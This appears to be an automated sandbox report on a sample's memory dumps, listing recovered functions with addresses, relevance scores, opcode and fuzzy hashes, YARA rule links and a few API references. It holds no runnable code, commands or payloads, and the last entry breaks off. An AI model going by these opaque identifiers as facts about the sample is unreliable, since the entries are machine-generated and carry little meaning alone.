Instruction Fuzzy Hash: 0A928C70F002188FDB24DB74C9557AEB6F2AF89314F1485A8E50AEB385EF759D858F80

Uniqueness

Uniqueness Score: -1.00%

Function 00708960, Relevance: .9, Instructions: 882COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2370655880.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e57d81066c849c1d3ace73098ae85e514936119ccc9d5ecd5434d01d512732e6
Instruction ID: 5a84930aa7784a0802bd9fdcb3e38839cbfc708c8f9ec7a0496cd217a33df8a5
Opcode Fuzzy Hash: e57d81066c849c1d3ace73098ae85e514936119ccc9d5ecd5434d01d512732e6
Instruction Fuzzy Hash: A662F030B04205DFCB04EBB4D8586AEBBF2AF85304F158969E509DB396EF78DC468B51

Uniqueness

Uniqueness Score: -1.00%

Function 00840048, Relevance: .8, Instructions: 844COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2370742887.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aadf525d4313115dc04b51246f732c44b3d8ff59b156293f86e4f1b1c89b683d
Instruction ID: e46cdb5f4be941294e3bf65f6963478926a14d339b171fb3c492a151e0825ca6
Opcode Fuzzy Hash: aadf525d4313115dc04b51246f732c44b3d8ff59b156293f86e4f1b1c89b683d
Instruction Fuzzy Hash: 25722934A002088FCB15EB74D858BAEBBB2FB88314F1584A9E50ADB355DF349D86DF51

Uniqueness

Uniqueness Score: -1.00%

Function 0070BBC0, Relevance: .8, Instructions: 771COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2370655880.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a1d9617c873dae03da40e7321f940d2f4fe5c3a1e225fc5d68142be9b0ff576
Instruction ID: 75f0c8e1a637a8b19083432fd5cdf625509aafe5bfc928c55ab0d454aec3c2d2
Opcode Fuzzy Hash: 1a1d9617c873dae03da40e7321f940d2f4fe5c3a1e225fc5d68142be9b0ff576
Instruction Fuzzy Hash: 0F52BE30A04209CFCB15DFB4C854AADBBF2AF85304F298665D515DB396DB79EC82CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0070C990, Relevance: .8, Instructions: 760COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2370655880.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e66530c71430d026b18874d2c1fe3e4a027b34e5d4e7c87ca71338854e8794e2
Instruction ID: f8c2b760bf955df96ceb5767dc63d1a68bb4a7988a8fd9ce26224915b822c33b
Opcode Fuzzy Hash: e66530c71430d026b18874d2c1fe3e4a027b34e5d4e7c87ca71338854e8794e2
Instruction Fuzzy Hash: B062F930E047198FCB24EBB8C85469EB7F1BF89304F1586A9D549AB254EF709E85CF81

Uniqueness

Uniqueness Score: -1.00%

Function 007016E1, Relevance: 6.5, Strings: 5, Instructions: 274COMMON

Download Yara Rule

Strings

!, xrefs: 00701929
!, xrefs: 00701979
!, xrefs: 00701931
!, xrefs: 007018E1
!, xrefs: 007018D9

Memory Dump Source

Source File: 00000005.00000002.2370655880.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false

Similarity

API ID:
String ID: !$!$!$!$!
API String ID: 0-2897704984
Opcode ID: 75c0166a72150ae111bab8896329139ba3a028ce7f604c0a5016dce881316ad7
Instruction ID: a469b0bf0122b7d2c382af4e289d561639dc9e0b6982dcde4e9b9ca644af1444
Opcode Fuzzy Hash: 75c0166a72150ae111bab8896329139ba3a028ce7f604c0a5016dce881316ad7
Instruction Fuzzy Hash: 5591B334B493819FD31397B498296A93FF19B56300F5A81F7D445CB2E3EA68CD0AC761

Uniqueness

Uniqueness Score: -1.00%

Function 00227BD8, Relevance: 4.0, APIs: 2, Instructions: 979COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0022866F

Memory Dump Source

Source File: 00000005.00000002.2370491308.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 6154d6ae05e7946097805730b4a0f3eaf0bd66d42da6353d14a1498728ef67da
Instruction ID: c9c9c20391c63a5dea0370ef5907f332f3202415415e71656ae72760030577aa
Opcode Fuzzy Hash: 6154d6ae05e7946097805730b4a0f3eaf0bd66d42da6353d14a1498728ef67da
Instruction Fuzzy Hash: 1CA221B4A15228CFCB24EF60D85869DB7B6BB88305F1084E9D60AA3354CF749EC5CF55

Uniqueness

Uniqueness Score: -1.00%

Function 008436B6, Relevance: 3.9, Strings: 3, Instructions: 163COMMON

Download Yara Rule

Strings

Hhl, xrefs: 008437A0
p:hl, xrefs: 00843818
p:hl, xrefs: 0084380C

Memory Dump Source

Source File: 00000005.00000002.2370742887.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false

Similarity

API ID:
String ID: p:hl$p:hl$Hhl
API String ID: 0-2135248130
Opcode ID: a97f4f654fcd4007f079bd10949a2ddcf2261bef982bbaddb8724f7b6e59e440
Instruction ID: 832e65bb01c44f2cfec94ad040e3f2216c202a179845e773c531148e70596cc8
Opcode Fuzzy Hash: a97f4f654fcd4007f079bd10949a2ddcf2261bef982bbaddb8724f7b6e59e440
Instruction Fuzzy Hash: 7A512A307082499FC7069BB4C8656AE7BF2AF86304B1584BAD005DF7A6DF74CD4AC791

Uniqueness

Uniqueness Score: -1.00%

Function 00227BF9, Relevance: 3.6, APIs: 2, Instructions: 632COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0022866F

Memory Dump Source

Source File: 00000005.00000002.2370491308.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 29a24b30a83de140c395091b9f1063c988baad8cf7eb354b6c703c5bc0c4f7a9
Instruction ID: a37f3a68ce161661cc6d35f23a25cf1757a40f4b4272634e06f44fe8f6d8e017
Opcode Fuzzy Hash: 29a24b30a83de140c395091b9f1063c988baad8cf7eb354b6c703c5bc0c4f7a9
Instruction Fuzzy Hash: 81620274A15228CFCB249F70D84869DB7BABF88305F2088E9D60AA3354CF749E85DF55

Uniqueness

Uniqueness Score: -1.00%

Function 00227C3E, Relevance: 3.6, APIs: 2, Instructions: 625COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0022866F

Memory Dump Source

Source File: 00000005.00000002.2370491308.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 050e5a69a41826c0e8c7c3ea19cbf929d770ab1242082b346002b095e2064298
Instruction ID: 4caf45d337c689bb58a84a91d4ff3597393518168b02ce54ed51f7fb13ff95c2
Opcode Fuzzy Hash: 050e5a69a41826c0e8c7c3ea19cbf929d770ab1242082b346002b095e2064298
Instruction Fuzzy Hash: 2B521374A15228CFCB249F60D84869DB7BABF88305F2088E9D60AA3354CF749EC5DF55

Uniqueness

Uniqueness Score: -1.00%

Function 00227C83, Relevance: 3.6, APIs: 2, Instructions: 618COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0022866F

Memory Dump Source

Source File: 00000005.00000002.2370491308.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 02530a44a63ec8f01075dbc404601f7153b7e234b34c6d892948dde4a2f45336
Instruction ID: 01520115203c098e7bc620fcae0e50c3f3894deefc35f35699cdef0de4fcdfbb
Opcode Fuzzy Hash: 02530a44a63ec8f01075dbc404601f7153b7e234b34c6d892948dde4a2f45336
Instruction Fuzzy Hash: 90521374A15228CFCB249F60D84869DB7BABF88305F2088E9D60AA3354CF749EC5DF55

Uniqueness

Uniqueness Score: -1.00%

Function 00227CC8, Relevance: 3.6, APIs: 2, Instructions: 611COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0022866F

Memory Dump Source

Source File: 00000005.00000002.2370491308.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 75314c1eebf2b76100550d1669a507bc04bfab92f1a70a969473e55d39fad0ea
Instruction ID: b67264a9eec90f55c44d001a7d0b9b4642bdac9483f0594394cd22ba86e93a20
Opcode Fuzzy Hash: 75314c1eebf2b76100550d1669a507bc04bfab92f1a70a969473e55d39fad0ea
Instruction Fuzzy Hash: 5D521274A15228CFCB249F60D84869DB7BABF88305F2088E9D60AA3354CF749EC5DF55

Uniqueness

Uniqueness Score: -1.00%

Function 00227D0D, Relevance: 3.6, APIs: 2, Instructions: 602COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0022866F

Memory Dump Source

Source File: 00000005.00000002.2370491308.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 49fbadebe9beb046d6490b6303253b6c8b0b2ea64a05c0420fb14be0706ca70a
Instruction ID: 326bd9cad367fa25cf700f058467b6114b318312a0ce171788ad67a3d8b50ef7
Opcode Fuzzy Hash: 49fbadebe9beb046d6490b6303253b6c8b0b2ea64a05c0420fb14be0706ca70a
Instruction Fuzzy Hash: F5521374A15228CFCB249F60D84869DB7BABF88305F2088E9D60AA3354CF749EC5DF55

Uniqueness

Uniqueness Score: -1.00%

Function 00227D5F, Relevance: 3.6, APIs: 2, Instructions: 593COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0022866F

Memory Dump Source

Source File: 00000005.00000002.2370491308.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: a0fc432bb77841dad8339a46ddd1ac4c48704279fa7e08fdc2fb856da8424f9f
Instruction ID: 4ed2858e5a181ec2811e3afc072ffcc334189f97a5950bbe44f6400176a9a617
Opcode Fuzzy Hash: a0fc432bb77841dad8339a46ddd1ac4c48704279fa7e08fdc2fb856da8424f9f
Instruction Fuzzy Hash: 1D521374A15228CFCB249F60D84869DB7BABF88305F2088E9D60AA3354CF749EC5DF55

Uniqueness

Uniqueness Score: -1.00%

Function 0022A618, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 88registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0022DAB1

Strings

,:S, xrefs: 0022A618

Memory Dump Source

Source File: 00000005.00000002.2370491308.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: QueryValue
String ID: ,:S
API String ID: 3660427363-433961121
Opcode ID: e855a9ac71769086567f7bf1892c7f70307714380def7de8edaa2dbeef2ff385
Instruction ID: 05c3331fc697bfdda0d7bde7dd8e8bce63e1cb7a954ee31f094ae739fb8924de
Opcode Fuzzy Hash: e855a9ac71769086567f7bf1892c7f70307714380def7de8edaa2dbeef2ff385
Instruction Fuzzy Hash: A231F2B1D14218AFCB10CFD9D484ADEBBF5BF48700F15842AE818AB314D7709905CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00227DA4, Relevance: 3.6, APIs: 2, Instructions: 586COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0022866F

Memory Dump Source

Source File: 00000005.00000002.2370491308.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: f5ddfb239c18ebdb3b9856fbc35b5cecb6cf18636e7e7094ddcd9d4e065ad81a
Instruction ID: a6e791f4bec314c82748e863cb0a24f9ed1545c45f06930415ec74713e39a883
Opcode Fuzzy Hash: f5ddfb239c18ebdb3b9856fbc35b5cecb6cf18636e7e7094ddcd9d4e065ad81a
Instruction Fuzzy Hash: D9521374A15228CFCB24AF60D84869DB7BABF88305F1088E9D60AA3354CF749EC5DF55

Uniqueness

Uniqueness Score: -1.00%

Function 00227DE9, Relevance: 3.6, APIs: 2, Instructions: 579COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0022866F

Memory Dump Source

Source File: 00000005.00000002.2370491308.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: fd5a2e5158b1883150c3040af3ed55e46c24bf668475d228e184ddec37135477
Instruction ID: 11273b0ce71f58c9a72a81add84e2d1f91a37bc1ed688d558e9b783999a464c4
Opcode Fuzzy Hash: fd5a2e5158b1883150c3040af3ed55e46c24bf668475d228e184ddec37135477
Instruction Fuzzy Hash: 1A522374A15228CFCB249F60D84869DB7BABF88305F2088E9D60AA3354CF749EC5DF55

Uniqueness

Uniqueness Score: -1.00%

Function 00227E2E, Relevance: 3.6, APIs: 2, Instructions: 572COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0022866F

Memory Dump Source

Source File: 00000005.00000002.2370491308.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: dc5d0c4aee4aa3a4629567e71e1503804eb8f1179c1e3917d979b216b323115d
Instruction ID: 22e963ab38ce5bd7643219366d3862f8aa41a926779cc16d693e5c3b9412c52e
Opcode Fuzzy Hash: dc5d0c4aee4aa3a4629567e71e1503804eb8f1179c1e3917d979b216b323115d
Instruction Fuzzy Hash: DC422474A15228CFCB249F60D84869DB7BABF88305F2088A9D60AA3354CF749EC5DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00227E73, Relevance: 3.6, APIs: 2, Instructions: 565COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0022866F

Memory Dump Source

Source File: 00000005.00000002.2370491308.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 8b5a2bff68275ce4baa205bbecb3ed3539d29120bfe809a8e921e4dec798ed63
Instruction ID: 07ba1c53dad0800ee1d02a92d28d4a02b778136e53dc9318fdc607743e54acf9
Opcode Fuzzy Hash: 8b5a2bff68275ce4baa205bbecb3ed3539d29120bfe809a8e921e4dec798ed63
Instruction Fuzzy Hash: 36422374A15228CFCB24AF70D85869DB7BABF88305F1088A9D60AA3354CF749EC5DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00227EB8, Relevance: 3.6, APIs: 2, Instructions: 556COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0022866F

Memory Dump Source

Source File: 00000005.00000002.2370491308.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: de9bb5a94973478656e5d415afca4757d2dbcaa899aae0223209dd8b64b3293b
Instruction ID: 9ddee1523170446f13291b4004a728c4659f1d79104d8e8d3f1357bf158a0e14
Opcode Fuzzy Hash: de9bb5a94973478656e5d415afca4757d2dbcaa899aae0223209dd8b64b3293b
Instruction Fuzzy Hash: B2422474A15228CFCB24AF70D85869DB7BABF88305F1088A9D60AA3354CF749EC5DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00227EF4, Relevance: 3.6, APIs: 2, Instructions: 551COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0022866F

Memory Dump Source

Source File: 00000005.00000002.2370491308.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 37cc5483f3919f8d80ee2414241b60cbc3bbe78d899266ba7438ff73a5892c10
Instruction ID: 830d9b611b0c01d6864c5df2c28a00183e409e673f6f62b76efa6432b89cb242
Opcode Fuzzy Hash: 37cc5483f3919f8d80ee2414241b60cbc3bbe78d899266ba7438ff73a5892c10
Instruction Fuzzy Hash: 8E422374A15228CFCB24AF70D85869DB7BABF88305F1088A9D60AA3354CF749EC5DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00227F39, Relevance: 3.5, APIs: 2, Instructions: 544COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0022866F

Memory Dump Source

Source File: 00000005.00000002.2370491308.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: a9dd256d46a349e870e30896b1162c8fa21d27b90cf63d0a2553744ea3374d85
Instruction ID: fc446d2f11a8112aedbc1fe5d7c9d4dbd7cec30ae995ad996c5b688ba748fc25
Opcode Fuzzy Hash: a9dd256d46a349e870e30896b1162c8fa21d27b90cf63d0a2553744ea3374d85
Instruction Fuzzy Hash: B3422474A15228CFCB24AF70D85869DB7BABF88305F1088A9D60AA3354CF749EC5DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00227F7E, Relevance: 3.5, APIs: 2, Instructions: 537COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0022866F

Memory Dump Source

Source File: 00000005.00000002.2370491308.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: e2d77498f40f1ae3c8cb5523fa1989f998c7c2c918e73e142f276ea77064eb64
Instruction ID: 6a4d5fba531184a2bcce3ad64f2a83c9cc57c05134dca85d3da76b8189b00e9d
Opcode Fuzzy Hash: e2d77498f40f1ae3c8cb5523fa1989f998c7c2c918e73e142f276ea77064eb64
Instruction Fuzzy Hash: 62422474A15228CFCB24AF70D85869DB7BABF88305F1088A9D60AA3354CF749EC5DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00227FC3, Relevance: 3.5, APIs: 2, Instructions: 530COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0022866F

Memory Dump Source

Source File: 00000005.00000002.2370491308.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: ee991f436afd9ae4a31694de1cdfd7602be8109da399048d8e14783063e1f65e
Instruction ID: fe419b49045a124877901238a0083182f9ed0761bfa7ff3db4ac6b35f04f748a
Opcode Fuzzy Hash: ee991f436afd9ae4a31694de1cdfd7602be8109da399048d8e14783063e1f65e
Instruction Fuzzy Hash: 63322474A15228CFCB24AF70D85869DB7BABF88305F1088A9D60AA3354CF749EC5DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00228008, Relevance: 3.5, APIs: 2, Instructions: 523COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0022866F

Memory Dump Source

Source File: 00000005.00000002.2370491308.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: f50e76b5eda862ba7f0ad7953c995ff884f8ca702dd299fd07314f0f54097616
Instruction ID: 8eeee921309e7c43cd4198eaf08cfec9e0c0db7c8ee5a771ec836107e042040f
Opcode Fuzzy Hash: f50e76b5eda862ba7f0ad7953c995ff884f8ca702dd299fd07314f0f54097616
Instruction Fuzzy Hash: 83322474A15228CFCB24AF70D85869DB7BABF88305F1088A9D60AA3354CF749EC5DF45

Uniqueness

Uniqueness Score: -1.00%

Function 0022804D, Relevance: 3.5, APIs: 2, Instructions: 516COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0022866F

Memory Dump Source

Source File: 00000005.00000002.2370491308.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 8ca01615aba331130daec08accba7e8d5bffc4cf64ce69763f31ed74764b5d6f
Instruction ID: e049e8282071f1a047ff16329ece51ab76d653cd7c5b33f7dfdd33c0200ca379
Opcode Fuzzy Hash: 8ca01615aba331130daec08accba7e8d5bffc4cf64ce69763f31ed74764b5d6f
Instruction Fuzzy Hash: 8B322474A15228CFCB24AF70D85869DB7B6BF88305F1088A9D60AA3354CF749EC5DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00228092, Relevance: 3.5, APIs: 2, Instructions: 509COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0022866F

Memory Dump Source

Source File: 00000005.00000002.2370491308.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 76d878defbaa50584b3d411075bf1868cecfa5394f2928ac9949463e58281c8c
Instruction ID: 5d655f8ddfbfcefcec112cdb1d3ab15f59de60397b62c7eea9b67cd2f1a57d7d
Opcode Fuzzy Hash: 76d878defbaa50584b3d411075bf1868cecfa5394f2928ac9949463e58281c8c
Instruction Fuzzy Hash: 97322574A15228CFCB24AF70D85869DB7BABF88305F1088A9D60AA3354CF749EC5DF45

Uniqueness

Uniqueness Score: -1.00%

Function 002284F8, Relevance: 3.3, APIs: 2, Instructions: 342COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0022866F
KiUserExceptionDispatcher.NTDLL ref: 00228AED

Memory Dump Source

Source File: 00000005.00000002.2370491308.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 0cde858ad329b26304bb87d6943be1487168814d26ec6f270a47e2afb0e4a70a
Instruction ID: 16fd4872215d2c8ed3a7e090e425feb1c0d5d6e505c92c768236cc5ad992ead2
Opcode Fuzzy Hash: 0cde858ad329b26304bb87d6943be1487168814d26ec6f270a47e2afb0e4a70a
Instruction Fuzzy Hash: 85F145B4916229CFCB24DF60E84469CB7B6BF88305F1088E9D60AA3354CF749E85DF59

Uniqueness

Uniqueness Score: -1.00%

Function 00228540, Relevance: 3.3, APIs: 2, Instructions: 335COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0022866F
KiUserExceptionDispatcher.NTDLL ref: 00228AED

Memory Dump Source

Source File: 00000005.00000002.2370491308.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: cb1e010c42aa6163e3da2cb611996fecb53215c2478887814de5ecc21bc81b54
Instruction ID: 5a90e75472e11ac790aaae31206c98abcde8900b17029181f9d0bca3a74c588b
Opcode Fuzzy Hash: cb1e010c42aa6163e3da2cb611996fecb53215c2478887814de5ecc21bc81b54
Instruction Fuzzy Hash: B7F124B4A16228CFCB24DF60D84469CB7B6BF88305F1088E9D60AA7354CF749E85DF59

Uniqueness

Uniqueness Score: -1.00%

Function 00228588, Relevance: 3.3, APIs: 2, Instructions: 328COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0022866F
KiUserExceptionDispatcher.NTDLL ref: 00228AED

Memory Dump Source

Source File: 00000005.00000002.2370491308.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 37f6109c494d21b39b752c831f7081e978727dbd9d58cbeca6947b19a5673da5
Instruction ID: b3473d3f8de820477b8f459160f3cfad86c599b9272b71b9ab0a1c4213e5d6d9
Opcode Fuzzy Hash: 37f6109c494d21b39b752c831f7081e978727dbd9d58cbeca6947b19a5673da5
Instruction Fuzzy Hash: 93F125B4916228CFCB24DF60D84469CB7B6BF88305F1088E9D60AA7354CF749E85DF59

Uniqueness

Uniqueness Score: -1.00%

Function 002285D0, Relevance: 3.3, APIs: 2, Instructions: 319COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0022866F
KiUserExceptionDispatcher.NTDLL ref: 00228AED

Memory Dump Source

Source File: 00000005.00000002.2370491308.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: dc811dbf92084e4e66d6f6e2a9f4d2ca4a5187af0658db3e35918f223781a26d
Instruction ID: 55c3e186d7f95eea6013cf895025d63db564c6bbf218b6c5a1bba27d512ee6dd
Opcode Fuzzy Hash: dc811dbf92084e4e66d6f6e2a9f4d2ca4a5187af0658db3e35918f223781a26d
Instruction Fuzzy Hash: 7AE135B4A15228CFCB249F60D8446ACB7B6BF88305F1088E9D60AA7354CF749EC5DF59

Uniqueness

Uniqueness Score: -1.00%

Function 0022860C, Relevance: 3.3, APIs: 2, Instructions: 312COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0022866F
KiUserExceptionDispatcher.NTDLL ref: 00228AED

Memory Dump Source

Source File: 00000005.00000002.2370491308.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 4159185bb7b92d12f57ffdecd6a127ad795dbcc9ebd92d7a5cebfe681c3850ce
Instruction ID: cea0bd486aa3a45a8e401aa7313a01e50356624cd5acc4e14ef69c782ba59330
Opcode Fuzzy Hash: 4159185bb7b92d12f57ffdecd6a127ad795dbcc9ebd92d7a5cebfe681c3850ce
Instruction Fuzzy Hash: C7E136B4A15228CFCB249F60D84469CB7B6BF88305F1088E9D60AA3354CF749EC5DF59

Uniqueness

Uniqueness Score: -1.00%

Function 00228648, Relevance: 3.3, APIs: 2, Instructions: 307COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0022866F
KiUserExceptionDispatcher.NTDLL ref: 00228AED

Memory Dump Source

Source File: 00000005.00000002.2370491308.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 0be0110298626dcc323ec80f609c0d041169badbf1c0064319f0da2bea8d28e7
Instruction ID: 6c6a87abd5dcd40f5435f1aa6a9017760bc5c29717d1cd169b39b7693bb24bf0
Opcode Fuzzy Hash: 0be0110298626dcc323ec80f609c0d041169badbf1c0064319f0da2bea8d28e7
Instruction Fuzzy Hash: 22E125B4A15228CFCB249F60D8446ACB7B6BF88305F1088E9D60AA7354CF749E85DF59

Uniqueness

Uniqueness Score: -1.00%

Function 007094B8, Relevance: 2.7, Strings: 2, Instructions: 174COMMON

Download Yara Rule

Strings

48*m, xrefs: 007095AE
48*m, xrefs: 00709612

Memory Dump Source

Source File: 00000005.00000002.2370655880.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false

Similarity

API ID:
String ID: 48*m$48*m
API String ID: 0-558052409
Opcode ID: 90ac6ea219d35403a8f961101b105207166ae07baad33b1a2079839e2a5a7934
Instruction ID: 998d620ff3ce5f16477251a1ce22699fdb9193ec61ad543732377138f28651ae
Opcode Fuzzy Hash: 90ac6ea219d35403a8f961101b105207166ae07baad33b1a2079839e2a5a7934
Instruction Fuzzy Hash: 8A511430B043099FCB11EBB4D855AEEBBF5AF84300F148A6AE516DB296EF74D845CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00709518, Relevance: 2.6, Strings: 2, Instructions: 148COMMON

Download Yara Rule

Strings

48*m, xrefs: 007095AE
48*m, xrefs: 00709612

Memory Dump Source

Source File: 00000005.00000002.2370655880.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false

Similarity

API ID:
String ID: 48*m$48*m
API String ID: 0-558052409
Opcode ID: 42751014a1d87a7de7651567c376f54ed90d10175cbe3787b292bfe2a48f0af8
Instruction ID: b9c7dbc88db1dd6703b16ebecd90550251ba6ae27a9e63c6e8cc605da1613112
Opcode Fuzzy Hash: 42751014a1d87a7de7651567c376f54ed90d10175cbe3787b292bfe2a48f0af8
Instruction Fuzzy Hash: 9D51E570A00209DFCB14EFF4D855AAEB7F6BF84304F148A69E5069B296EF74D845CB90

Uniqueness

Uniqueness Score: -1.00%

Function 002286A6, Relevance: 1.8, APIs: 1, Instructions: 296COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00228AED

Memory Dump Source

Source File: 00000005.00000002.2370491308.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: c1f1bce1f733c7d70032bb8e9aec36a05f019298db4ee146ab3d59a621145b14
Instruction ID: dde6f9d9a66b5db6194bca61097b0071006ce9e3ce78722d12767a1f1c946248
Opcode Fuzzy Hash: c1f1bce1f733c7d70032bb8e9aec36a05f019298db4ee146ab3d59a621145b14
Instruction Fuzzy Hash: 67D146B4A16228CFCB249F60D84469CB7B6BF88305F1088E9D60AA7354CF749EC5DF59

Uniqueness

Uniqueness Score: -1.00%

Function 002286EE, Relevance: 1.8, APIs: 1, Instructions: 289COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00228AED

Memory Dump Source

Source File: 00000005.00000002.2370491308.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
